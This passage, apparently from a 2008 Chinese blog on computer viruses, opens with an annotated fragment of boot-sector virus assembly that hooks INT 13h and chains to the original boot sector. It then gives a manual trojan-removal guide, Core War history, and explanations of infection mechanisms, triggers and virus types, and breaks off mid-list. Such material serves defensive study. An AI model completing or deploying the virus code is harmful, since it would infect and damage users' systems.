     mov cx,0100h
     repz movsw   ; 将病毒移到高端.
   v2: push ax
     pop ds
     push ax
     mov bx,7c4bh
     push bx
     ret       ; 指令执行转入高端内存
     call v3
   v3: xor ah,ah    ; ah=0
     int 13h
     mov ah,80h
     and byte ptr ds:[7df8h],al
   v4: mov bx,word ptr ds:[7df9h] ; 读入病毒的其他部分.
     push cs
     pop ax     ; ax=97c0
     sub ax,20h   ; ax=97a0
     mov es,ax    ; es=97a0
     call v9
     mov bx,word ptr ds:[7df9h] ; load logic sector id
     inc bx           ; bx++ , is boot sector
     mov ax,0ffc0h  ; ffc0:8000 = 0000:7c00 读入原引导分区内容.
     mov es,ax
     call v9
     xor ax,ax    ; AX=0
     mov byte ptr ds:[7df7h],al ; flag = 0
   v5: mov ds,ax    ; ds=0
     mov ax,word ptr ds:[4ch]  ;
     mov bx,word ptr ds:[4eh]  ; 修改中断向量.
    mov word ptr ds:[4ch],7cd6h
     mov word ptr ds:[4eh],cs  ; now int13h had been changed
     push cs
     pop ds     ; ds=cs
     mov word ptr ds:[7d30h],ax ; save original int13 vector
     mov word ptr ds:[7d32h],bx ;
   v6: mov dl,byte ptr ds:[7df8h] ; load drive letter
   v7:
     ;=======================================================
     ; jmp 0000:7c00       ; here is a jump
     db 0eah,00h,7ch,00h,00h 这里是个跳转指令的二进制代码.
     ;=======================================================
d. 读入原主引导分区,转去执行dos的引导工作。




Modified At 2008-01-23 17:58:01

木马病毒的通用解法

        “木马”程序会想尽一切办法隐藏自己,主要途径有:
        在任务栏中隐藏自己,这是最基本的只要把Form的Visible属性设为False、ShowInTaskBar设为False,程序运行时就不会出现在任务栏中了。
        在任务管理器中隐形:将程序设为“系统服务”可以很轻松地伪装自己。 当然它也会悄无声息地启动,你当然不会指望用户每次启动后点击“木马”图标来运行服务端,“木马”会在每次用户启动时自动装载服务端,Windows系统启动时自动加载应用程序的方法,“木马”都会用上,如:启动组、win.ini、system.ini、注册表等等都是“木马”藏身的好地方。
        下面具体谈谈“木马”是怎样自动加载的。     
        在win.ini文件中,在[WINDOWS]下面,“run=”和“load=”是可能加载“木马”程序的途径,必须仔细留心它们。一般情况下,它们的等号后面什么都没有,如果发现后面跟有路径与文件名不是你熟悉的启动文件,你的计算机就可能中上“木马”了。当然你也得看清楚,因为好多“木马”,如“AOL Trojan木马”,它把自身伪装成command.exe文件,如果不注意可能不会发现它不是真正的系统启动文件。 
        在system.ini文件中,在[BOOT]下面有个“shell=文件名”。正确的文件名应该是“explorer.exe”,如果不是“explorer.exe”,而是“shell= explorer.exe 程序名”,那么后面跟着的那个程序就是“木马”程序,就是说你已经中“木马”了。 
        在注册表中的情况最复杂,通过regedit命令打开注册表编辑器,在点击至:“HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”目录下,查看键值中有没有自己不熟悉的自动启动文件,扩展名为EXE,这里切记:有的“木马”程序生成的文件很像系统自身文件,想通过伪装蒙混过关,如“Acid Battery v1.0木马”,它将注册表“HKEY-LOCAL-MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”下的 Explorer 键值改为Explorer=“C:\WINDOWS\expiorer.exe”,“木马”程序与真正的Explorer之间只有“i”与“l”的差别。当然在注册表中还有很多地方都可以隐藏“木马”程序,如:“HKEY-CURRENT-USER\Software\Microsoft\Windows\CurrentVersion\Run”、“HKEY-USERS\****\Software\Microsoft\Windows\CurrentVersion\Run”的目录下都有可能,最好的办法就是在“HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”下找到“木马”程序的文件名,再在整个注册表中搜索即可。 
        知道了“木马”的工作原理,查杀“木马”就变得很容易,如果发现有“木马”存在,最安全也是最有效的方法就是马上将计算机与网络断开,防止黑客通过网络对你进行攻击。然后编辑win.ini文件,将[WINDOWS]下面,“run=“木马”程序”或“load=“木马”程序”更改为“run=”和“load=”;编辑system.ini文件,将[BOOT]下面的“shell=‘木马’文件”,更改为:“shell=explorer.exe”;在注册表中,用regedit对注册表进行编辑,先在“HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”下找到“木马”程序的文件名,再在整个注册表中搜索并替换掉“木马”程序,有时候还需注意的是:有的“木马”程序并不是直接将“HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”下的“木马”键值删除就行了,因为有的“木马”如:BladeRunner“木马”,如果你删除它,“木马”会立即自动加上,你需要的是记下“木马”的名字与目录,然后退回到MS-DOS下,找到此“木马”文件并删除掉。重新启动计算机,然后再到注册表中将所有“木马”文件的键值删除。至此,我们就大功告成了。





Modified At 2008-05-21 19:22:56

计算机病毒的原理(不断更新)

到底什么病毒才是蠕虫

     “计算机病毒”与医学上的“病毒”不同,它不是天然存在的,是某些人利用计算机软、硬件所固有的脆弱性,编制成的具有特殊功能的程序,通常人们称之为电脑病毒。1994年2月18日,我国正式颁布实施了《中华人民共和国计算机信息系统安全保护 条例》,在《条例》第二十八条中明确指出:“计算机病毒,是指编制或者在计算机程序中插入的破坏计算机功能或者毁坏数据,影响计算机使用,并能自我复制的一组计算机指令或者程序代码。”
计算机病毒之所以被称为“病毒”,主要是由于它有类似自然界病毒的某些特征。其主要特征有:(1)隐蔽性,指病毒的存在、传染和对数据的破坏过程不易为计算机操作人员发现;寄生性,计算机病毒通常是依附于其它文件而存在的;(2)传染性,指计算机病毒在一定条件下可以自我复制,能对其它文件或系统进行一系列非法操作,并使之成为一个新的传染源。这是病毒的最基本特征;(3)触发性,指病毒的发作一般都需要一个激发条件,可以是日期、时间、特定程序的运行或程序的运行次数等等,如臭名昭著的CIH病毒就发作于每个月的26日;(4)破坏性:指病毒在触发条件满足时,立即对计算机系统的文件、资源等运行进行干扰破坏;(5)不可预见性,指病毒相对于防毒软件永远是超前的,理论上讲,没有任何杀毒软件能将所有的病毒杀除。
从运作过程来看,计算机病毒可以分为三个部分,即病毒引导程序、病毒传染程序、病毒病发程序。从破坏程度来看,计算机病毒可分为良性病毒和恶性病毒;根据传播方式和感染方式,可分为引导型病毒、分区表病毒、宏病毒、文件型病毒、复合型病毒等。
计算机病毒的危害主要表现在三大方面,一是破坏文件或数据,造成用户数据丢失或毁损;二是抢占系统网络资源,造成网络阻塞或系统瘫痪;三是破坏操作系统等软件或计算机主板等硬件,造成计算机无法启动。
 
 
 
 
 
 
 
 
 
 
 
 
 
电脑病毒的起源
    电脑病毒的历史:磁蕊大战

  电脑病毒并非是最近才出现的新产物, 事实上, 早在一九四九年, 距离第一部商用电脑的出现仍有好几年时, 电脑的先驱者约翰.范纽曼(John Von Neumann)在他所提出的一篇论文 [复杂自动装置的理论及组织的进行] , 即已把病毒程式的蓝图勾勒出来, 当时, 绝大部份的电脑专家都无法想像这种会自我繁植的程式是可能的, 可是少数几个科学家默默的研究范纽曼的所提出的概念, 直到十年之後, 在美国电话电报公司(AT&T) 的贝尔(Bell)实验室中, 这些概念在一种很奇怪的电子游戏中成形了, 这种电子游戏叫做 [磁蕊大战] (core war)
磁蕊大战是当时贝尔实验室中三个年轻程式人员在工馀想出来的, 他们是道格拉斯麦耀莱(H, Douglas McIlroy), 维特.维索斯基(Victor Vysottsky)以及罗伯.莫里斯(Robert T. Morris), 当时三人年纪都只有二十多岁.
 
附注: Robert T. Morris 就是後来写了一个 Worm, 把 Internet 搞的天翻地覆的那个 Robert T. Morris Jr. 的爸爸, 当时大 Morris 刚好是负责 Arpanet网路安全 .
 
电脑病毒的老祖宗:
 
   磁蕊大战的玩法如下:两方各写一套程式, 输入同一部电脑中, 这两套程式在电脑的记忆系统内互相追杀,有时它们会放下一些关卡,有时会停下来修理(重新写)被对方破坏的几行指令 ;当它被困时,也可以把自己复制一次,逃离险境,因为它们都在电脑的记忆磁蕊中游走,因此得到了磁蕊大战之名.这个游戏的特点,在於双方的程式进入电脑之後,玩游戏的人只能看著萤幕上显示的战况,而不能做任何更改,一直到某一方的程式被另一方的程式完全 [吃掉] 为止.
   磁蕊大战是个笼统的名称,事实上还可细分成好几种,麦耀莱所写的程式叫 [达尔文]这包含了 [物竞天择,适者生存] 的意思 . 它的游戏规则跟以上所描述的最接近,双方以组合语言(Assembly Language)各写一套程式,叫有机体(organism),这两个有机体在电脑里争斗不休,直到一方把另一方杀掉而取代之,便算分出胜负. 在比赛时 Morris 经常匠心独具,击败对手.
   另外有个叫爬行者程式(Creeper)的,每一次把它读出时,它便自己复制一个副本.此外,它也会从一部电脑[爬]到另一部有连线的电脑.很快地电脑中原有资料便被这些爬行者挤掉了.爬行者的微一生存目地是繁殖.
   为了对付[爬行者],有人便写出了[收割者](Reaper).它的唯一生存目的便是找到爬行者,把它们毁灭掉.当所有爬行者都被收割掉之後,收割者便执行程式中最後一项指令:毁灭自己,从电脑中消失.
   [侏儒](Dwarf)并没有达尔文等程式聪明.却可是个极端危险人物.它在记忆系统中迈进,每到第五个[地址](address)便把那里所储存的东西变为零,这会使的原本的程式停摆.
    最奇特的就是一个叫[印普](Imp)的战争程式了,它只有一行指令,那就是MOV 01MOV是[MOVE]的代表,即移动的意思 .它把身处的地址中所载的[0]写(移)到下一个地址中,当印普展开行动之後,电脑中原有的每一行指令都被改为[MOV 01].换句话说,萤光幕上留下一大堆[MOV 01].
   [双子星](Germini)也是个有趣的家伙.它的作用只有一个:把自己复制,送到下一百个地址後,便抛弃掉[正本].
   从双子星衍生出一系列的程式.[牺牲者](Juggeraut)把自己复制後送到下十个地址之後;而[大雪人](Bigfoot)则把正本和复制品之间的地址定为某一个大质数.想抓到大雪人可是非常困难的.此外,还有全录(Xerox)柏路阿图研究中心的约翰.索殊(John F.Shoch)所写的[蠕虫](Worm),它的目的是要控制侵入的电脑.
 
电脑病毒的出现
 
   在那些日子里,电脑都没有连线,而是互相独立的,因此并不会出现小莫礼士所引起的病毒瘟疫.如果有某部电脑受到[感染],失去控制,工作人员只需把它关掉便可.但是当电脑连线逐渐成为社会结构的一部份之後,一个或自我复制的病毒程式便很可能带来无穷的祸害了.因此长久一来,懂的玩[磁蕊大战]游戏的电脑工作者都严守一项不成文的规定: 不对普罗大众公开这些战争程式的内容.
   一九八三年,这项规定被打破了.科恩.汤普逊(Ken Thompson)是当年一项杰出电脑讲得奖人.在颁奖典礼上,他作了一个演讲,不但公开地证实了电脑病毒的存在,而且还告诉所有听众怎样去写自己的病毒程式.
   他的同行全都吓坏了,然而这个秘密已经流传出去了.一九八四年,情况愈复杂了.这一年,[科学美国人]月刊(Scientific American)的专栏作家杜特尼(A. K. Dewdney)在五月号写了第一篇讨论[磁蕊大战]的文章,并且只要寄上两块美金,任何读者都可以收到它所写得有关写程式的纲领,在自己家中的电脑中开辟战场.
[病毒]一词的正式出现
   在一九八五年三月份的[科学美国人]里,杜特尼再次讨论[磁蕊大战]—–和病毒.在文章的开头他便说:[当去年五月有关[磁蕊大战]的文章印出来时,我并没有想过我所谈论的是那么严重的题目]文中并第一次提到[病毒]这个名称.他提到说,义大利的罗勃吐.些鲁帝(Roberto Cerruti)和马高.么鲁顾帝(Marco Morocutti)发明了一种破坏软体的方法.他们想用病毒,而不是蠕虫,来使得苹果二号电脑受感染.
   些鲁弟写了一封信给杜特尼,信内说:[马高想写一个像[病毒]一样的程式,可以从一部苹果电脑传染到另一部苹果电脑,使其受到感染.可是我们没法这样做,直到我想到,这病毒要先使磁碟受到感染,而电脑只是媒介.这样,病毒就可以从一片磁碟传染到另一片磁碟了.
 
 
 
 
 
 
 
 
 
 

 

 
病毒的特性
传染性

计算机病毒的传染性是指病毒具有把自身复制到其他程序中的特性。计算机病毒是一段人为编制的计算机程序代码,这段程序代码一旦进入计算机并得以执行,它会搜寻其他符合其传染条件的程序或存储介质,确定目标后再将自身代码插入其中,达到自我繁殖的目的。只要一台计算机染毒,如不及时处理,那么病毒会在这台机子上迅速扩散,其中的大量文件(一般是可执行文件)会被感染。而被感染的文件又成了新的传染源,再与其他机器进行数据交换或通过网络接触,病毒会继续进行传染。
正常的计算机程序一般是不会将自身的代码强行连接到其它程序之上的。而病毒却能使自身的代码强行传染到一切符合其传染条件的未受到传染的程序之上。计算机病毒可通过各种可能的渠道,如软盘、计算机网络去传染其它的计算机。当你在一台机器上发现了病毒时,往往曾在这台计算机上用过的软盘已感染上了病毒,而与这台机器相联网的其它计算机也许也被该病毒侵染上了。是否具有传染性是判别一个程序是否为计算机病毒的最重要条件。
 
非授权性
 
一般正常的程序是由用户调用,再由系统分配资源,完成用户交给的任务。其目的对用户是可见的、透明的。而病毒具有正常程序的一切特性,它隐藏再正常程序中,当用户调用正常程序时窃取到系统的控制权,先于正常程序执行,病毒的动作、目的对用户时未知的,是未经用户允许的。
 
隐蔽性
 
病毒一般是具有很高编程技巧、短小精悍的程序。通常附在正常程序中或磁盘较隐蔽的地方,也有个别的以隐含文件形式出现。目的是不让用户发现它的存在。如果不经过代码分析,病毒程序与正常程序是不容易区别开来的。一般在没有防护措施的情况下,计算机病毒程序取得系统控制权后,可以在很短的时间里传染大量程序。而且受到传染后,计算机系统通常仍能正常运行,使用户不会感到任何异常。试想,如果病毒在传染到计算机上之后,机器马上无法正常运行,那么它本身便无法继续进行传染了。正是由于隐蔽性,计算机病毒得以在用户没有察觉的情况下扩散到上百万台计算机中。
大部分的病毒的代码之所以设计得非常短小,也是为了隐藏。病毒一般只有几百或1k字节,而PC机对DOS文件的存取速度可达每秒几百KB以上,所以病毒转瞬之间便可将这短短的几百字节附着到正常程序之中,使人非常不易被察觉。
 
潜伏性
 
大部分的病毒感染系统之后一般不会马上发作,它可长期隐藏在系统中,只有在满足其特定条件时才启动其表现(破坏)模块。只有这样它才可进行广泛地传播。如“PETER-2”在每年2月27日会提三个问题,答错后会将硬盘加密。著名的“黑色星期五”在逢13号的星期五发作。国内的“上海一号”会在每年三、六、九月的13日发作。当然,最令人难忘的便是26日发作的CIH。这些病毒在平时会隐藏得很好,只有在发作日才会露出本来面目。
 
破坏性
 
任何病毒只要侵入系统,都会对系统及应用程序产生程度不同的影响。轻者会降低计算机工作效率,占用系统资源,重者可导致系统崩溃。由此特性可将病毒分为良性病毒与恶性病毒。良性病度可能只显示些画面或出点音乐、无聊的语句,或者根本没有任何破坏动作,但会占用系统资源。这类病毒较多,如:GENP、小球、W-BOOT等。恶性病毒则有明确得目的,或破坏数据、删除文件或加密磁盘、格式化磁盘,有的对数据造成不可挽回的破坏。这也反映出病毒编制者的险恶用心。
 
不可预见性
 
从对病毒的检测方面来看,病毒还有不可预见性。不同种类的病毒,它们的代码千差万别,但有些操作是共有的(如驻内存,改中断)。有些人利用病毒的这种共性,制作了声称可查所有病毒的程序。这种程序的确可查出一些新病毒,但由于目前的软件种类极其丰富,且某些正常程序也使用了类似病毒的操作甚至借鉴了某些病毒的技术。使用这种方法对病毒进行检测势必会造成较多的误报情况。而且病毒的制作技术也在不断的提高,病毒对反病毒软件永远是超前的。
 
 
 
 
 
 
 
 

计算机病毒的传染机制
    1.计算机病毒的传染方式
    所谓传染是指计算机病毒由一个载体传播到另一个载体,由一个系统进入另一个系统的过程。这种载体一般为磁盘或磁带,它是计算机病毒赖以生存和进行传染的媒介。但是,只有载体还不足以使病毒得到传播。促成病毒的传染还有一个先决条件,可分为两种情况,或者叫做两种方式。
    其中一种情况是,用户在进行拷贝磁盘或文件时,把一个病毒由一个载体复制到另一个载体上。或者是通过网络上的信息传递,把一个病毒程序从一方传递到另一方。这种传染方式叫做计算机病毒的被动传染。
    另外一种情况是,计算机病毒是以计算机系统的运行以及病毒程序处于激活状态为先决条件。在病毒处于激活的状态下,只要传染条件满足,病毒程序能主动地把病毒自身传染给另一个载体或另一个系统。这种传染方式叫做计算机病毒的主动传染。
    2.计算机病毒的传染过程
    对于病毒的被动传染而言,其传染过程是随着拷贝磁盘或文件工作的进行而进行的,而对于计算机病毒的主动传染而言,其传染过程是这样的:在系统运行时,病毒通过病毒载体即系统的外存储器进入系统的内存储器,常驻内存,并在系统内存中监视系统的运行。在病毒引导模块将病毒传染模块驻留内存的过程中,通常还要修改系统中断向量入口地址(例如INT 13H或INT 21H),使该中断向量指向病毒程序传染模块。这样,一旦系统执行磁盘读写操作或系统功能调用,病毒传染模块就被激活,传染模块在判断传染条件满足的条件下, 利用系统INT 13H读写磁盘中断把病毒自身传染给被读写的磁盘或被加载的程序,也就是实施病毒的传染,然后再转移到原中断服务程序执行原有的操作。
    计算机病毒的传染方式基本可分为两大类,一是立即传染,即病毒在被执行到的瞬间,抢在宿主程序开始执行前,立即感染磁盘上的其他程序,然后再执行宿主程序;二是驻留内存并伺机传染,内存中的病毒检查当前系统环境,在执行一个程序或D1R等操作时传染磁盘上的程序,驻留在系统内存中的病毒程序在宿主程序运行结束后, 仍可活动,直至关闭计算机。
    3.系统型病毒传染机理
    计算机软硬盘的配置和使用情况是不同的。软盘容量小,可以方便地移动交换使用,在计算机运行过程中可能多次更换软盘;硬盘作为固定设备安装在计算机内部使用,大多数计算机配备一只硬盘。系统型病毒针对软硬盘的不同特点采用了不同的传染方式。
    系统型病毒利用在开机引导时窃获的INT  13控制权,在整个计算机运行过程中随时监视软盘操作情况, 趁读写软盘的时机读出软盘引导区,判断软盘是否染毒,如未感染就按病毒的寄生方式把原引导区写到软盘另一位置,把病毒写入软盘第一个扇区,从而完成对软盘的传染。染毒的软盘在软件交流中又会传染其他计算机。由于在每个读写阶段病毒都要读引导区,既影响微机工作效率,又容易因驱动器频繁寻道而造成物理损伤。
    系统型病毒对硬盘的传染往往是在计算机上第一次使用带毒软盘进行的,具体步骤与软盘传染相似,也是读出引导区判断后写入病毒。
    4.文件型病毒传染机理
    当执行被传染的.COM或.EXE可执行文件时,病毒驻人内存。一旦病毒驻人内存,便开始监视系统的运行。当它发现被传染的目标时,进行如下操作:
    (1)首先对运行的可执行文件特定地址的标识位信息进行判断是否已感染了病毒;
    (2)当条件满足,利用INT  13H将病毒链接到可执行文件的首部或尾部或中间,并存入磁盘中;
    (3)完成传染后,继续监视系统的运行,试图寻找新的攻击目标。
    文件型病毒通过与磁盘文件有关的操作进行传染,主要传染途径有:
    (1)加载执行文件
    文件型病毒驻内存后,通过其所截获的INT 21中断检查每一个加载运行可执行文件进行传染。
    加载传染方式每次传染一个文件,即用户准备运行的那个文件,传染不到那些用户没有使用的文件。
    (2)列目录过程
    一些病毒编制者可能感到加载传染方式每次传染一个文件速度较慢,不够过瘾,于是后来造出通过列目录传染的病毒。
    在用户列硬盘目录的时候,病毒检查每一个文件的扩展名,如果是可执行文件就调用病毒的传染模块进行传染。这样病毒可以一次传染硬盘一个于目录下的全部可执行文件。DIR是最常用的DOS命令,每次传染的文件又多,所以病毒的扩散速度很快,往往在短时间内传遍整个硬盘。
    对于软盘而言,由于读写速度比硬盘慢得多,如果一次传染多个文件所费时间较长,容易被用户发现,所以病毒“忍痛”放弃了一些传染机会,采用列一次目录只传染一个文件的方式。
    (3)创建文件过程
    创建文件是DOS内部的一项操作,功能是在磁盘上建立一个新文件。 已经发现利用创建文件过程把病毒附加到新文件上去的病毒,这种传染方式更为隐蔽狡猾。因为加载传染和列目录传染都是病毒感染磁盘上原有的文件,细心的用户往往会发现文件染毒前后长度的变化,从而暴露病毒的踪迹。而创建文件的传染手段却造成了新文件生来带毒的奇观。好在一般用户很少去创建一个可执行文件,但经常使用各种编译、连接工具的计算机专业工作者应该注意文件型病毒发展的这一动向,特别在商品软件最后生成阶段严防此类病毒。
 
 
 
 
 
 
 
 
 
 
 
计算机病毒的破坏机制
 
    破坏机制在设计原则、工作原理上与传染机制基本相同。它也是通过修改某一中断向量人口地址(一般为时钟中 断INT 8H,或与时钟中断有关的其他中断,如INT 1CH),使该中断向量指向病毒程序的破坏模块。这样, 当系统或 被加载的程序访问该中断向量时,病毒破坏模块被激活,在判断设定条件满足的情况下,对系统或磁盘上的文件进行 破坏活动,这种破坏活动不一定都是删除磁盘文件,有的可能是显示一串元用的提示信息,例如,在用感染了“大麻 病毒”的系统盘进行启动时,屏幕上会出现“Your PC is now Stoned!”。有的病毒在发作时,会干扰系统或用户的 正常工作,例如“小球”病毒在发作时,屏幕上会出现一个上下来回滚动的小球。而有的病毒,一旦发作,则会造成 系统死机或删除磁盘文件。例如,“黑色星期五”病毒在激活状态下,只要判断当天既是13号又是星期五,则病毒程序的破坏模块即把当前感染该病毒的程序从磁盘上删除。
计算机病毒的破坏行为体现了病毒的杀伤力。病毒破坏行为的激烈程度取决于病毒作者的主观愿望和他所具有的 技术能量。数以万计、不断发展扩张的病毒,其破坏行为千奇百怪,不可能穷举其破坏行为,难以做全面的描述。病 毒破坏目标和攻击部位主要是:系统数据区、文件、内存、系统运行、运行速度、磁盘、屏幕显示、键盘、喇叭、打 印机、CMOS、主板等。

 

 
 
 
 
 

 
 

 
计算机病毒的触发
感染、潜伏、可触发、破坏是病毒的基本特性。感染使病毒得以传播,破坏性体现了病 毒的杀伤能力。广范围感染,众多病毒的破坏行为可能给用户以重创。但是,感染和破坏 行为总是使系统或多或少地出现异常。频繁的感染和破坏会使病毒暴露,而不破坏、不感 染又会使病毒失去杀伤力。可触发性是病毒的攻击性和潜伏性之间的调整杠杆,可以控制 病毒感染和破坏的频度,兼顾杀伤力和潜伏性。
??
过于苛刻的触发条件,可能使病毒有好的潜伏性,但不易传播,只具低杀伤力。而过于 宽松的触发条件将导致病毒频繁感染与破坏,容易暴露,导致用户做反病毒处理,也不能 有大的杀伤力。 计算机病毒在传染和发作之前,往往要判断某些特定条件是否满足,满足则传染或发 作,否则不传染或不发作只传染不发作,这个条件就是计算机病毒的触发条件。 实际上病毒采用的触发条件花样繁多,从中可以看出病毒作者对系统的了解程度及 其丰富的想象力和创造力。
??
目前病毒采用的触发条件主要有以下几种:
??
1.日期触发:许多病毒采用日期做触发条件。日期触发大体包括:特定日期触发、月份 触发、前半年后半年触发等。
??
2.时间触发:时间触发包括特定的时间触发、染毒后累计工作时间触发、文件最后写 入时间触发等。
??
3.键盘触发:有些病毒监视用户的击键动作,当现病毒预定的键入时、病毒被激活, 进行某些特定操作。键盘触发包括击键次数触发、组合键触发、热启动触发等。
??
4.感染触发:许多病毒的感染需要某些条件触发,而且相当数量的病毒又以与感染有 关的信息反过来作为破坏行为的触发条件,称为感染触发。它包括:运行感染文件个数触 发、感染序数触发、感染磁盘数触发、感染失败触发等。
??
5.启动触发:病毒对机器的启动次数计数,并将此值作为触发条件称为启动触发。
??
6.访问磁盘次数触发:病毒对磁盘I/O访问的次数进行计数,以预定次数做触发条 件叫访问磁盘次数触发。
??
7.调用中断功能触发:病毒对中断调用次数计数,以预定次数做触发条件。
??
8.CPU型号/主板型号触发:病毒能识别运行环境的CPU型号/主板型号,以预定 CPU型号/主板型号做触发条件,这种病毒的触发方式奇特罕见。 被计算机病毒使用的触发条件是多种多样的,而且往往不只是使用上面所述的某一 个条件,而是使用由多个条件组合起来的触发条件。
??
大多数病毒的组合触发条件是基于 时间的,再辅以读、写盘操作,按键操作以及其他条件。如“侵略者”病毒的激发时间是开 机后机器运行时间和病毒传染个数成某个比例时,恰好按CTRL+ALT+DEL组合键试 图重新启动系统则病毒发作。 病毒中有关触发机制的编码是其敏感部分。剖析病毒时,如果搞清病毒的触发机制, 可以修改此部分代码,使病毒失效,就可以产生没有潜伏性的极为外露的病毒样本,供反 病毒研究使用。
 
 
 
 
 

 
 
 
 

计算机病毒传染的一般过程
 
在系统运行时, 病毒通过病毒载体即系统的外存储器进入系统的内存储器, 常驻内存。该病毒在系统内存中监视系统的运行, 当它发现有攻击的目标存在并满足条件时,便从内存中将自身存入被攻击的目标, 从而将病毒进行传播。 而病毒利用系统INT 13H读写磁盘的中断又将其写入系统的外存储器软盘或硬盘中, 再感染其他系统。
 
可执行文件感染病毒后又怎样感染新的可执行文件?
 
可执行文件.COM或.EXE感染上了病毒, 例如黑色星期五病毒, 它驻入内存的条件是在执行被传染的文件时进入内存的。
一旦进入内存,便开始监视系统的运行。当它发现被传染的目标时, 进行如下操作:
(1)首先对运行的可执行文件特定地址的标识位信息进行判断是否已感染了病毒;
(2)当条件满足, 利用INT 13H将病毒链接到可执行文件的首部或尾部或中间, 并存大磁盘中;
(3)完成传染后, 继续监视系统的运行, 试图寻找新的攻击目标。
 
操作系统型病毒是怎样进行传染的?
 
正常的PC DOS启动过程是:
(1)加电开机后进入系统的检测程序并执行该程序对系统的基本设备进行检测;
(2)检测正常后从系统盘0面0道1扇区即逻辑0扇区读入Boot引导程序到内存的0000: 7C00处;
(3)转入Boot执行之;
(4)Boot判断是否为系统盘, 如果不是系统盘则提示;
non-system disk or disk error
Replace and strike any key when ready
否则, 读入IBM BIO.COM和IBM DOS.COM两个隐含文件;
(5)执行IBM BIO.COM和IBM DOS.COM两个隐含文件, 将COMMAND.COM装入内存;
(6)系统正常运行, DOS启动成功。
 
如果系统盘已感染了病毒, PC DOS的启动将是另一番景象, 其过程为:
 
(1)将Boot区中病毒代码首先读入内存的0000: 7C00处;
(2)病毒将自身全部代码读入内存的某一安全地区、常驻内存, 监视系统的运行;
(3)修改INT 13H中断服务处理程序的入口地址, 使之指向病毒控制模块并执行之。因为任何一种病毒要感染软盘或者硬盘,都离不开对磁盘的读写操作, 修改INT13H中断服务程序的入口地址是一项少不了的操作;
(4)病毒程序全部被读入内存后才读入正常的Boot内容到内存的0000: 7C00处, 进行正常的启动过程;
(5)病毒程序伺机等待随时准备感染新的系统盘或非系统盘。
 
如果发现有可攻击的对象, 病毒要进行下列的工作:
 
(1)将目标盘的引导扇区读入内存, 对该盘进行判别是否传染了病毒;
(2)当满足传染条件时, 则将病毒的全部或者一部分写入Boot区, 把正常的磁盘的引导区程序写入磁盘特写位置;
(3)返回正常的INT 13H中断服务处理程序, 完成了对目标盘的传染

 
 
 
 
 
 
 
 
计算机病毒的生命周期
 
    计算机病毒的产生过程可分为:程序设计-传播-潜伏-触发、运行-实行攻击。计算机病毒拥有一个生命周期,从生成开 始到完全根除结束。下面我们描述病毒生命周期的各个时期。

开发期:在几年前,制造一个病毒需要计算机编程语言的知识。但是今天有一点计算机编程知识的人都可以制造一个病毒。通常计算机病毒是一些误人歧途的、试图传播计算机病毒和破坏计算机的个人或组织制造的。
 
传染期:在一个病毒制造出来后,病毒的编写者将其拷贝并确认其已被传播出去。通常的办法是感染一个流行的程序, 再将其放入BBS站点上、校园和其他大型组织当中分发其复制物。
 
潜伏期:病毒是自然地复制的。一个设计良好的病毒可以在它活化前长时期里被复制。这就给了它充裕的传播时间。这时病毒的危害在于暗中占据存储空间。
 
发作期:带有破坏机制的病毒会在遇至(某一特定条件时发作,一旦遇上某种条件,比如某个日期或出现了用户采取的某特定行为,病毒就被活化了。没有感染程序的病毒属于没有活化,这时病毒的危害在于暗中占据存储空间。
 
发现期:这一段并非总是这样做,但通常如此。当一个病毒被检测到并被隔离出来后,它被送到计算机安全协会或反病毒厂家,在那里病毒被通报和描述给反病毒研究工作者。通常发现病毒是在病毒成为计算机社会的灾难之前完成的。
 
消化期:在这一阶段,反病毒开发人员修改他们的软件以使其可以检测到新发现的病毒。这段时间的长短取决于开发人员的素质和病毒的类型。
 
消亡期:若是所有用户安装了最新版的杀毒软件,那么任何病毒都将被扫除。这样没有什么病毒可以广泛地传播,但有一些病毒在消失之前有一个很长的消亡期。至今,还没有哪种病毒已经完全消失,但是某些病毒已经在很长时间里不再是一个重要的威胁了。
 
 
 
 
 
 
 
 

 
到底什么病毒才是蠕虫
 
  蠕虫(Worm)是通过分布式网络来扩散传播特定的信息或错误,进而造成网络服务遭到拒绝并发生死锁。
  1982年,Shock和Hupp根据The Shockwave Rider一书中的一种概念提出了一种“蠕虫”(Worm)程序的思想。
  这种“蠕虫”程序常驻于一台或多台机器中,并有自动重新定位(autorelocation)的能力。如果它检测到网络中的某台机器未被占用,它就把自身的一个拷贝(一个程序段)发送给那台机器。每个程序段都能把自身的拷贝重新定位于另一台机器中,并且能识别它占用的哪台机器。
  “蠕虫”程序不一定是有害的。论证了“蠕虫”程序可用作为Ethernet网络设备的一种诊断工具,它能快速有效地检测网络。
  “蠕虫”由两部分组成:一个主程序和一个引导程序。 主程序一旦在机器上建立就会去收集与当前机器联网的其它机器的信息。它能通过读取公共配置文件并运行显示当前网上联机状态信息的系统实用程序而做到这一点。随后,它尝试利用前面所描述的那些缺陷去在这些远程机器上建立其引导程序。
  正是这个一般称作引导程序或“钓鱼”程序的小小程序,把“蠕虫”带入了它感染的每一台机器。

 
 

 
 
 

 

病毒最常见的有哪几种类型
  DOS病毒:
 
  指针对DOS操作系统开发的病毒。目前几乎没有新制作的DOS病毒,由于Win9x病 毒的出现,DOS病毒几乎绝迹。但DOS病毒在Win9x环境中仍可以进行感染活动,因此若执行染毒文件,Win9x用户也 会被感染。我们使用的杀毒软件能够查杀的病毒中一半以上都是DOS病毒,可见DOS时代DOS病毒的泛滥程度。但这些 众多的病毒中除了少数几个让用户胆战心惊的病毒之外,大部分病毒都只是制作者出于好奇或对公开代码进行一定变 形而制作的病毒。
 
  Windows病毒:
 
  主要指针对Win9x操作系统的病毒。现在的电脑用户一般都安装Windows系统? Windows病毒一般感染Win9x系统,其中最典型的病毒有CIH病毒。但这并不意味着可以忽略系统是WinNT系列包括 Win2000 的计算机。一些Windows病毒不仅在Win9x上正常感染,还可以感染WinNT上的其它文件。主要感染的文 件扩展名为EXE?SCR?DLL?OCX等。
 
  入侵型病毒:
 
  可用自身代替正常程序中的部分模块或堆栈区。因此这类病毒只攻击某些特定程 序,针对性强。一般情况下难以发现,清除起来较困难。
 
  嵌入式病毒:
 
  这种病毒将自身代码嵌入到被感染文件中,当文件被感染后,查杀和清除病毒都 非常不易。不过编写嵌入式病毒比较困难,所以这种病毒数量不多。
 
  外壳类病毒:
 
